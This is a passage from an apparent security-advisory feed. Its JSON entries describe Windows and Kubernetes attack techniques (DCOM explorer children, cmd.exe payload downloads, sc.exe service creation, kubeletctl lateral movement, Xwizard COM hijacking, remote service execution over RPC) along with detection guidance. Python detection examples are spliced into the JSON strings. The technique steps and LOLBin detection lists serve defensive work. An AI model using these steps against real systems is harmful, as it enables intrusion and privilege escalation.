or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code under a parent that security tooling treats as trusted, evading controls and analytics that key on the parent process. This can lead to initial access, privilege escalation, and persistence within the compromised system. The compromise can remain undetected for extended periods due to the trusted nature of the parent process (explorer.exe), enabling attackers to perform reconnaissance, deploy malware, exfiltrate data, or disrupt services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line details to detect suspicious explorer.exe child processes.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Explorer Child Process - PowerShell\u0026rdquo; to identify instances of PowerShell spawned by explorer.exe with suspicious arguments.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Explorer Child Process - Scripting Engines\u0026rdquo; to detect other scripting engines launched by explorer.exe.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for processes like powershell.exe, cmd.exe, cscript.exe, wscript.exe, mshta.exe, regsvr32.exe, and rundll32.exe whose parent is explorer.exe and whose parent command line carries the \u0026ldquo;-Embedding\u0026rdquo; argument (the switch COM passes when it launches Explorer as a DCOM server; the interactive desktop instance runs without it), using process creation logs that record the parent command line.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict execution of unsigned or untrusted scripts and executables.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-explorer-child-process/","summary":"Adversaries abuse the trusted status of explorer.exe to launch malicious scripts or executables, often using DCOM to start processes like PowerShell or cmd.exe, achieving initial access, defense evasion, and 
execution.","title":"Suspicious Explorer Child Process via DCOM","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-explorer-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Excel","MS Access","MS Publisher","PowerPoint","Word","Outlook"],"_cs_severities":["low"],"_cs_tags":["command-prompt","network-connection","windows","execution","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious network connections initiated by the command prompt (cmd.exe) on Windows systems. The rule focuses on cmd.exe processes executed with specific arguments, such as those indicating script execution (e.g., *.bat, *.cmd), access to remote resources (e.g., URLs), or those spawned by Microsoft Office applications (Excel, Word, etc.). Attackers frequently abuse cmd.exe to download malicious payloads, execute commands, or establish command and control channels. This detection aims to identify such potentially malicious activity by correlating process creation events with subsequent network connections. The rule excludes common private and reserved IP address ranges to reduce false positives. 
The targeted systems are Windows endpoints where adversaries attempt to leverage cmd.exe for malicious purposes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious document (e.g., Word, Excel) or executes a seemingly benign application.\u003c/li\u003e\n\u003cli\u003eThe document or application contains a macro or script that initiates a cmd.exe process.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process is launched with arguments indicating script execution (\u003ccode\u003e/c\u003c/code\u003e, \u003ccode\u003e/k\u003c/code\u003e) and referencing a remote resource (e.g., a URL) or a local batch file.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process attempts to download a payload from a remote server using protocols like HTTP, HTTPS, or FTP.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with a disguised filename.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process executes the downloaded payload, initiating further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious payload establishes a command and control (C2) channel with a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised system, potentially leading to data exfiltration or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of Windows endpoints, potentially enabling attackers to download and execute malicious payloads, establish command and control channels, and perform further malicious activities such as data theft, lateral movement, or ransomware deployment. 
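The process-creation and network-connection logic described in the two briefs above, as an added example that is not part of this feed or of Elastic's rule code: rule 1 is the explorer.exe child started with the DCOM activation argument "-Embedding", rule 2 is cmd.exe launched with script or URL arguments or by an Office parent, correlated with a later outbound connection from the same process to an address outside the private and reserved ranges. Field names are ECS-style assumptions; the hosts, PIDs, file names and addresses in the sample events are constructed (8.8.8.8 only stands in for any routable address).

```python
"""Added example, not CraftedSignal's or Elastic's rule code: two detections
from the briefs above, run over constructed Sysmon-style events.

Rule 1: scripting/LOLBin children of explorer.exe started with the DCOM
activation argument "-Embedding".
Rule 2: cmd.exe started with script/URL arguments or by an Office parent,
correlated (same host and pid) with a later outbound connection to an
address outside private/reserved ranges.
Field names follow ECS; every event below is constructed for the example.
"""
import ipaddress
from typing import Dict, List

EXPLORER_CHILDREN = {"powershell.exe", "cmd.exe", "cscript.exe", "wscript.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe"}
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe"}
SCRIPT_MARKERS = (".bat", ".cmd", "http://", "https://", "ftp://")


def explorer_dcom_child(ev: Dict) -> bool:
    """Rule 1: known LOLBin spawned by explorer.exe with -Embedding."""
    if ev["event"] != "process_start":
        return False
    p = ev["process"]
    return (p["parent"]["name"].lower() == "explorer.exe"
            and p["name"].lower() in EXPLORER_CHILDREN
            and any(a.lower() == "-embedding" for a in p["args"]))


def suspicious_cmd_start(ev: Dict) -> bool:
    """Rule 2a: cmd.exe with script/URL arguments or an Office parent."""
    if ev["event"] != "process_start":
        return False
    p = ev["process"]
    if p["name"].lower() != "cmd.exe":
        return False
    if p["parent"]["name"].lower() in OFFICE_PARENTS:
        return True
    args = " ".join(p["args"]).lower()
    return any(m in args for m in SCRIPT_MARKERS)


def is_external(ip: str) -> bool:
    """True for routable addresses. Python's is_private also covers the
    RFC 5737 documentation ranges, matching the rule's exclusion list."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified)


def cmd_network_alerts(events: List[Dict]) -> List[Dict]:
    """Rule 2: arm on a suspicious cmd.exe start, alert when the same
    host/pid later connects to an external address. Events must be in
    time order."""
    armed, alerts = set(), []
    for ev in events:
        key = (ev["host"], ev["process"]["pid"])
        if suspicious_cmd_start(ev):
            armed.add(key)
        elif (ev["event"] == "network_connection" and key in armed
              and is_external(ev["destination"]["ip"])):
            alerts.append({"host": ev["host"], "pid": ev["process"]["pid"],
                           "dest": ev["destination"]["ip"]})
    return alerts


# Constructed sample telemetry (hosts, pids and addresses are made up).
SAMPLE_EVENTS = [
    {"event": "process_start", "host": "ws01",
     "process": {"pid": 4100, "name": "powershell.exe",
                 "args": ["powershell.exe", "-Embedding"],
                 "parent": {"name": "explorer.exe"}}},
    {"event": "process_start", "host": "ws01",
     "process": {"pid": 4200, "name": "cmd.exe",
                 "args": ["cmd.exe", "/c", "stage.bat"],
                 "parent": {"name": "WINWORD.EXE"}}},
    {"event": "network_connection", "host": "ws01",
     "process": {"pid": 4200, "name": "cmd.exe"},
     "destination": {"ip": "8.8.8.8"}},          # stands in for any routable address
    # Scheduled batch job reaching an internal file server: not alerted.
    {"event": "process_start", "host": "ws02",
     "process": {"pid": 5000, "name": "cmd.exe",
                 "args": ["cmd.exe", "/c", "backup.bat"],
                 "parent": {"name": "taskeng.exe"}}},
    {"event": "network_connection", "host": "ws02",
     "process": {"pid": 5000, "name": "cmd.exe"},
     "destination": {"ip": "10.0.0.5"}},
]


def run_sample():
    """Returns (pids matching rule 1, rule 2 alerts) for SAMPLE_EVENTS."""
    dcom = [e["process"]["pid"] for e in SAMPLE_EVENTS if explorer_dcom_child(e)]
    return dcom, cmd_network_alerts(SAMPLE_EVENTS)


if __name__ == "__main__":
    print(run_sample())
```

The ws02 pair shows why the private-range exclusion matters: the batch file argument alone arms the rule, and only the destination address keeps a routine internal job from alerting. In production the armed set needs an expiry so long-lived cmd.exe sessions do not stay armed forever.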
While this detection has a low severity, it serves as an early warning sign of potential compromise and should be investigated promptly.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of cmd.exe executions.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from cmd.exe processes, focusing on connections to external IP addresses, using a network monitoring solution.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious cmd.exe network connections.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on cmd.exe processes spawned by Office applications or those executing scripts from remote URLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-cmd-network/","summary":"This alert identifies suspicious network connections initiated by the command prompt (cmd.exe) when executed with arguments indicative of script execution, remote resource access, or originating from Microsoft Office applications, which is a common tactic for downloading payloads or establishing command and control.","title":"Suspicious Command Prompt Network Connection","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-cmd-network/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Windows Security Event Logs"],"_cs_severities":["low"],"_cs_tags":["privilege-escalation","defense-evasion","execution","windows","service-creation"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft"],"content_html":"\u003cp\u003eThis detection identifies instances where the Service Control utility (sc.exe) is executed from within a script interpreter, such as cmd.exe, PowerShell, or 
wscript.exe. Attackers may leverage this behavior to create, modify, or start Windows services, often with the intent to elevate privileges or establish persistence on a compromised system. sc.exe is a legitimate Windows command-line tool used for managing services, so abusing it lets attackers perform malicious actions under the guise of routine system administration. This detection is designed to identify anomalous use of sc.exe that deviates from typical administrative tasks, focusing on instances where it\u0026rsquo;s spawned from scripting environments often used for malicious activities. The rule specifically excludes service creations performed by the SYSTEM user.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system via an exploit or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script interpreter (e.g., cmd.exe, powershell.exe).\u003c/li\u003e\n\u003cli\u003eWithin the script interpreter, the attacker uses sc.exe to manage Windows services.\u003c/li\u003e\n\u003cli\u003eThe sc.exe command is used with arguments such as \u0026ldquo;create\u0026rdquo;, \u0026ldquo;start\u0026rdquo;, \u0026ldquo;stop\u0026rdquo;, \u0026ldquo;delete\u0026rdquo;, or \u0026ldquo;config\u0026rdquo; to manipulate service configurations.\u003c/li\u003e\n\u003cli\u003eA new service is created or an existing service is modified to execute a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe malicious service is started. A service created without an explicit account runs as LocalSystem, so the payload executes as SYSTEM; because creating or reconfiguring a service already requires administrative rights, this step converts local admin into SYSTEM and a durable foothold rather than elevating a standard user.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence by ensuring the malicious service automatically starts upon system reboot.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the created service to execute additional malicious commands or maintain remote access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack could lead to complete system compromise with the attacker gaining SYSTEM level privileges. This can allow for lateral movement within the network, data exfiltration, or installation of persistent backdoors. While the frequency of this specific technique may be low, the potential impact is high due to the elevated privileges gained.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eService Control Spawning via Script Interpreter\u003c/code\u003e to your SIEM to detect this specific behavior and tune it to your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for sc.exe being executed by script interpreters like PowerShell or cmd.exe (as covered in the rule description).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of sc.exe being used with the arguments \u0026ldquo;create\u0026rdquo;, \u0026ldquo;start\u0026rdquo;, \u0026ldquo;stop\u0026rdquo;, \u0026ldquo;delete\u0026rdquo;, or \u0026ldquo;config\u0026rdquo; from scripting environments to identify potentially malicious activity.\u003c/li\u003e\n\u003cli\u003eEnsure proper access controls are in place to limit the ability of users to create or modify services.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-service-control-script-spawn/","summary":"Detection of Service Control (sc.exe) being spawned from script interpreter processes, such as PowerShell or cmd.exe, to create, modify, or start services, which may indicate privilege escalation or persistence attempts by an attacker.","title":"Service Control Executed from Script Interpreters","url":"https://feed.craftedsignal.io/briefs/2024-01-02-service-control-script-spawn/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defend for 
Containers"],"_cs_severities":["high"],"_cs_tags":["container","kubeletctl","lateral-movement","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis rule detects the execution of \u003ccode\u003ekubeletctl\u003c/code\u003e inside a container. Kubeletctl is a command-line tool that interacts with the Kubelet API directly, making the often undocumented API more accessible. From a compromised container, attackers may use it to enumerate the node\u0026rsquo;s Kubelet API (normally TCP 10250) and the pods it hosts, a step towards lateral movement from that pod to others on the same node. The detection is based on the \u0026ldquo;Defend for Containers\u0026rdquo; integration (version 9.3.0 and later) within the Elastic stack. This activity is significant because \u003ccode\u003ekubeletctl\u003c/code\u003e can expose pod and node details, enabling actions that facilitate discovery and lateral movement from a compromised container.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a container, possibly through a vulnerability in the containerized application or a misconfigured Kubernetes environment.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ekubeletctl\u003c/code\u003e inside the compromised container. 
This could be facilitated by the tool being present in the container image or downloaded post-compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubeletctl scan\u003c/code\u003e to discover Kubelet endpoints within the Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages \u003ccode\u003ekubeletctl pods\u003c/code\u003e or \u003ccode\u003ekubeletctl runningpods\u003c/code\u003e to enumerate running pods and their details.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the discovered pod information to identify potential targets for lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to use \u003ccode\u003ekubeletctl exec\u003c/code\u003e or \u003ccode\u003ekubeletctl attach\u003c/code\u003e to gain access to other pods within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to port forward using \u003ccode\u003ekubeletctl portForward\u003c/code\u003e to establish connections to services running in other pods.\u003c/li\u003e\n\u003cli\u003eUpon successful lateral movement, the attacker performs further reconnaissance or deploys malicious payloads to achieve their objectives, such as data exfiltration or denial-of-service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of \u003ccode\u003ekubeletctl\u003c/code\u003e within a container can lead to the exposure of sensitive information about the Kubernetes cluster, including pod details and internal network configurations. This can enable attackers to move laterally within the cluster, potentially compromising other applications and data. 
The impact could range from data breaches and service disruptions to full cluster compromise depending on the attacker\u0026rsquo;s objectives and the scope of the compromised container\u0026rsquo;s access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect the execution of \u003ccode\u003ekubeletctl\u003c/code\u003e within containers based on process name and arguments.\u003c/li\u003e\n\u003cli\u003eMonitor container network activity for connections to node addresses on Kubelet ports (commonly 10250/10255) and investigate any suspicious patterns.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict pod-to-node access to the Kubelet API.\u003c/li\u003e\n\u003cli\u003eHarden container images by removing unnecessary tools like \u003ccode\u003ekubeletctl\u003c/code\u003e and enforce least privilege principles.\u003c/li\u003e\n\u003cli\u003eEnable and review Kubernetes audit logs to identify the source of interactive sessions into containers, correlating with timestamps of \u003ccode\u003ekubeletctl\u003c/code\u003e execution.\u003c/li\u003e\n\u003cli\u003eEnforce Pod Security Standards to restrict privileged pods and limit node API exposure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-kubeletctl-container-execution/","summary":"This rule detects the execution of kubeletctl inside a container, which can be used to enumerate the Kubelet API or other resources inside the container, potentially indicating lateral movement attempts within the pod.","title":"Kubeletctl Execution Inside Container Detected","url":"https://feed.craftedsignal.io/briefs/2024-01-kubeletctl-container-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud 
Funnel"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","com-object","xwizard","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Component Object Model (COM) facilitates communication between software components. Attackers can leverage Xwizard, a legitimate Windows system binary, to execute COM objects and bypass security measures. This technique allows adversaries to proxy the execution of malicious code through a trusted system utility, making detection more challenging. This activity has been observed since at least 2017, with potential links to PlugX malware variants. Any Windows system that ships \u003ccode\u003exwizard.exe\u003c/code\u003e can be abused this way; no vulnerability or misconfiguration is required, only the ability to register a COM class. Defenders should monitor Xwizard execution for suspicious arguments and deviations from expected file paths to identify potential misuse of COM objects.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access via an unconfirmed method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eThe attacker registers a malicious COM class in the Windows Registry: a CLSID whose server entry points at attacker-controlled code. The per-user \u003ccode\u003eHKCU\\Software\\Classes\\CLSID\u003c/code\u003e hive accepts such registrations without administrative rights.\u003c/li\u003e\n\u003cli\u003eThe attacker invokes \u003ccode\u003exwizard.exe\u003c/code\u003e with the \u003ccode\u003eRunWizard\u003c/code\u003e argument and a GUID referencing the malicious COM object.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003exwizard.exe\u003c/code\u003e reads the COM object\u0026rsquo;s configuration from the registry.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003exwizard.exe\u003c/code\u003e executes the code associated with the malicious COM object.\u003c/li\u003e\n\u003cli\u003eThe malicious COM object performs unauthorized actions, such as downloading additional payloads or establishing command and control.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence by ensuring the malicious COM 
object is executed on system startup or user login.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code, potentially leading to data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on compromised systems in the context of the user who runs \u003ccode\u003exwizard.exe\u003c/code\u003e. This can lead to data theft, malware installation, or complete system compromise. Exposure is broad: the technique needs no vulnerability, only a Windows system with \u003ccode\u003exwizard.exe\u003c/code\u003e and a registered COM class, so any sector running Windows is in scope. While specific victim counts are unavailable, the widespread use of Windows makes this a potentially significant threat. If the attack succeeds, attackers can gain persistent access and use the foothold to move laterally within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process execution events for instances of \u003ccode\u003exwizard.exe\u003c/code\u003e with suspicious arguments like \u003ccode\u003eRunWizard\u003c/code\u003e and GUIDs, and for copies running from anywhere other than the expected System32 or SysWOW64 path, using the \u0026ldquo;Execution of COM object via Xwizard\u0026rdquo; rule as a baseline.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rules provided to detect anomalous Xwizard executions and COM object abuse.\u003c/li\u003e\n\u003cli\u003eAudit and monitor registry modifications, specifically looking for COM object registrations using registry_set rules.\u003c/li\u003e\n\u003cli\u003eEnsure that endpoint detection and response (EDR) solutions are configured to detect and block suspicious process executions originating from \u003ccode\u003exwizard.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) and registry event logging (Event ID 12, 13, 14) for enhanced visibility, as mentioned in the setup 
guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-xwizard-com-execution/","summary":"Adversaries may abuse Xwizard, a Windows system binary, to execute Component Object Model (COM) objects created in the registry to evade defensive countermeasures by proxying execution through a legitimate system tool.","title":"Xwizard COM Object Execution for Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-xwizard-com-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["SCCM"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Pella Corporation","AdminArsenal","ESET","Veeam"],"content_html":"\u003cp\u003eThis detection rule identifies the remote execution of Windows services over Remote Procedure Call (RPC), a technique often employed for lateral movement within a network. The rule focuses on correlating network connections initiated by \u003ccode\u003eservices.exe\u003c/code\u003e with subsequent child process creation events. While this activity can be a legitimate function of administrators using remote management tools, it also represents a potential attack vector. The rule aims to strike a balance between detecting malicious activity and minimizing false positives arising from routine administrative tasks. The detection logic is based on identifying network connections to \u003ccode\u003eservices.exe\u003c/code\u003e followed by the creation of child processes that are not commonly associated with legitimate service management. 
The rule requires the use of Elastic Defend or Sysmon for adequate logging coverage.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to move laterally to other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a connection to the target system\u0026rsquo;s \u003ccode\u003eservices.exe\u003c/code\u003e process over RPC using a high port (\u0026gt;= 49152), the dynamic RPC port range. Note that the same Service Control Manager interface is also reachable over the \u003ccode\u003esvcctl\u003c/code\u003e named pipe on TCP 445 (SMB); that path terminates in the kernel SMB server rather than a \u003ccode\u003eservices.exe\u003c/code\u003e socket, so a connection-based rule does not see it.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established RPC connection to create or start a new service on the remote system.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eservices.exe\u003c/code\u003e process on the remote system spawns a child process related to the newly created or started service.\u003c/li\u003e\n\u003cli\u003eThis new process executes the attacker\u0026rsquo;s payload, potentially granting further access or executing malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the newly executed service for persistent access or further lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack could result in unauthorized access to sensitive data, disruption of critical services, or the deployment of ransomware. Lateral movement allows attackers to compromise multiple systems within the network, escalating the impact of the initial breach. 
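The inbound-connection-then-child-process sequence that the brief above correlates, as an added example that is not part of this feed or of Elastic's rule code: an ingress TCP connection to services.exe on a dynamic RPC port (49152 or above) followed on the same host, inside a short window, by a services.exe child that is not on a known-good list is reported together with the remote source address. The 30-second window, the allow-list, the ECS-style field names and all sample events (hosts, addresses, ports, paths) are assumptions constructed for the example.

```python
"""Added example, not CraftedSignal's or Elastic's rule code: the sequence
the brief above describes, run over constructed Sysmon-style events. An
inbound TCP connection to services.exe on a dynamic RPC port (>= 49152)
followed, on the same host within a short window, by a services.exe child
not on a known-good list is reported with the remote source address.
Field names follow ECS; window, allow-list and events are assumptions."""
from collections import deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List

RPC_DYNAMIC_PORT_MIN = 49152
WINDOW = timedelta(seconds=30)
# Children services.exe spawns legitimately; tune for your environment.
KNOWN_GOOD = {"svchost.exe", "msiexec.exe", "spoolsv.exe", "trustedinstaller.exe"}


def _ts(ev: Dict) -> datetime:
    return datetime.fromisoformat(ev["@timestamp"])


def is_inbound_scm_rpc(ev: Dict) -> bool:
    """Remote client reaching the SCM RPC endpoint hosted by services.exe."""
    return (ev["event"] == "network_connection"
            and ev["process"]["name"].lower() == "services.exe"
            and ev["network"]["direction"] == "ingress"
            and ev["destination"]["port"] >= RPC_DYNAMIC_PORT_MIN)


def is_unusual_service_child(ev: Dict) -> bool:
    """Child of services.exe outside the allow-list."""
    return (ev["event"] == "process_start"
            and ev["process"]["parent"]["name"].lower() == "services.exe"
            and ev["process"]["name"].lower() not in KNOWN_GOOD)


def correlate(events: List[Dict]) -> List[Dict]:
    """Events must be sorted by @timestamp. Per host, keep the inbound SCM
    connections seen inside WINDOW and pair each unusual child with the
    most recent one; a child with no preceding connection is a local
    service start and is ignored."""
    recent: Dict[str, Deque[Dict]] = {}
    alerts: List[Dict] = []
    for ev in events:
        q = recent.setdefault(ev["host"], deque())
        while q and _ts(ev) - _ts(q[0]) > WINDOW:   # expire old connections
            q.popleft()
        if is_inbound_scm_rpc(ev):
            q.append(ev)
        elif is_unusual_service_child(ev) and q:
            src = q[-1]
            alerts.append({"host": ev["host"],
                           "source_ip": src["source"]["ip"],
                           "child": ev["process"]["name"],
                           "command_line": ev["process"]["command_line"]})
    return alerts


# Constructed sample telemetry (hosts, addresses, ports and paths are made up).
SAMPLE_EVENTS = [
    {"@timestamp": "2024-01-02T12:00:00", "event": "network_connection",
     "host": "srv05", "process": {"pid": 700, "name": "services.exe"},
     "network": {"direction": "ingress"},
     "source": {"ip": "10.0.0.9", "port": 51234},
     "destination": {"ip": "10.0.5.5", "port": 49670}},
    {"@timestamp": "2024-01-02T12:00:02", "event": "process_start",
     "host": "srv05",
     "process": {"pid": 7100, "name": "cmd.exe",
                 "command_line": "cmd.exe /c C:\\Windows\\Temp\\svc.bat",
                 "parent": {"name": "services.exe"}}},
    {"@timestamp": "2024-01-02T12:00:05", "event": "process_start",
     "host": "srv05",
     "process": {"pid": 7200, "name": "svchost.exe",
                 "command_line": "svchost.exe -k netsvcs",
                 "parent": {"name": "services.exe"}}},
    # Service started locally on another host: no inbound RPC, no alert.
    {"@timestamp": "2024-01-02T12:10:00", "event": "process_start",
     "host": "srv06",
     "process": {"pid": 3300, "name": "cmd.exe",
                 "command_line": "cmd.exe /c C:\\ops\\rotate.bat",
                 "parent": {"name": "services.exe"}}},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The allow-list is where the tuning the brief recommends happens: add the remote-management agents your environment uses by executable name (or extend the check to process.executable or process.args) rather than widening the window, since a longer window mostly adds unrelated local service starts.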
Due to the nature of the technique, it can be challenging to distinguish between legitimate administrative activity and malicious actions, leading to delayed detection and increased dwell time for attackers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM and tune the filters for known-good executables in your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation (Event ID 1) and network connection (Event ID 3) logging to ensure the required data for the Sigma rules is available.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by these rules, focusing on the parent process and network connection details associated with the spawned child process.\u003c/li\u003e\n\u003cli\u003eConsider excluding known remote management tools from triggering the detection by adding exceptions based on \u003ccode\u003eprocess.executable\u003c/code\u003e or \u003ccode\u003eprocess.args\u003c/code\u003e in the Sigma rules.\u003c/li\u003e\n\u003cli\u003eMonitor the network for unusual RPC activity, especially connections to \u003ccode\u003eservices.exe\u003c/code\u003e from unexpected source IPs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-remote-service-execution/","summary":"Detection of remote execution of Windows services over RPC by correlating `services.exe` network connections and spawned child processes, potentially indicating lateral movement.","title":"Remote Execution of Windows Services via RPC","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-service-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github-actions","supply-chain","execution","devops"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis 
